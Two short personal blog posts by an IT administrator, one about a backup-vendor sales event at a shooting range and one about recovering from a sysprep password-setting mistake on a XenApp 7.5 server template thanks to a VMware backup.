Yesterday I attended a sales pitch for Barracuda backup appliances, hosted by SLAIT Consulting at Colonial Shooting Academy in Virginia Beach, VA. I always enjoy attending these events, if nothing else you always meet new people and get some lunch while learning about new technology.

What made this event so awesome is the fact that I love to shoot guns, and the event was at a gun store and shooting range. After lunch and the sales pitch we were given a safety brief and headed to the range. In addition to a selection of pistols, they laid out a couple of AR-15's and an AK-47 and all the ammo you could shoot. This was the first time I had ever shot an AR or AK. It was a BLAST!


First lonely post

Today I'm recovering from a very simple mistake that could have cost me weeks of work if I hadn't made a backup copy in VMware of the application server I am building for XenApp 7.5. I painstakingly installed and tweaked a long list of applications on Server 2008 R2 to be used as the master image for XenApp 7.5 Machine Creation Services (MCS).

I hit a wall with an issue connecting my XenApp 7.5 DC to vSphere for the MCS connection. I submitted traces to Citrix support, who eventually called it a VMware issue. While waiting for VMware support, I decided to manually create the servers in VMware instead of using MCS so that I could forge ahead in the Citrix upgrade. I can always go back and integrate MCS after the VMware issue is resolved. I sysprepped my application server and created a vm template. After creating my first server from the template, I realized that I FORGOT TO UNCHECK "User cannot change password" for the administrator account before shutting the server down after running sysprep. Great, now I can't login since it forces you to set the administrator password on first login, and the password can't be changed.

What I SHOULD HAVE DONE is to clone my app server, then sysprep the clone and leave the original server intact. Thankfully I had created a backup copy of this server in the lab, so with a few clicks and a short delay I'm making progress again.

Sometimes it's the simple things that can cause you the most pain.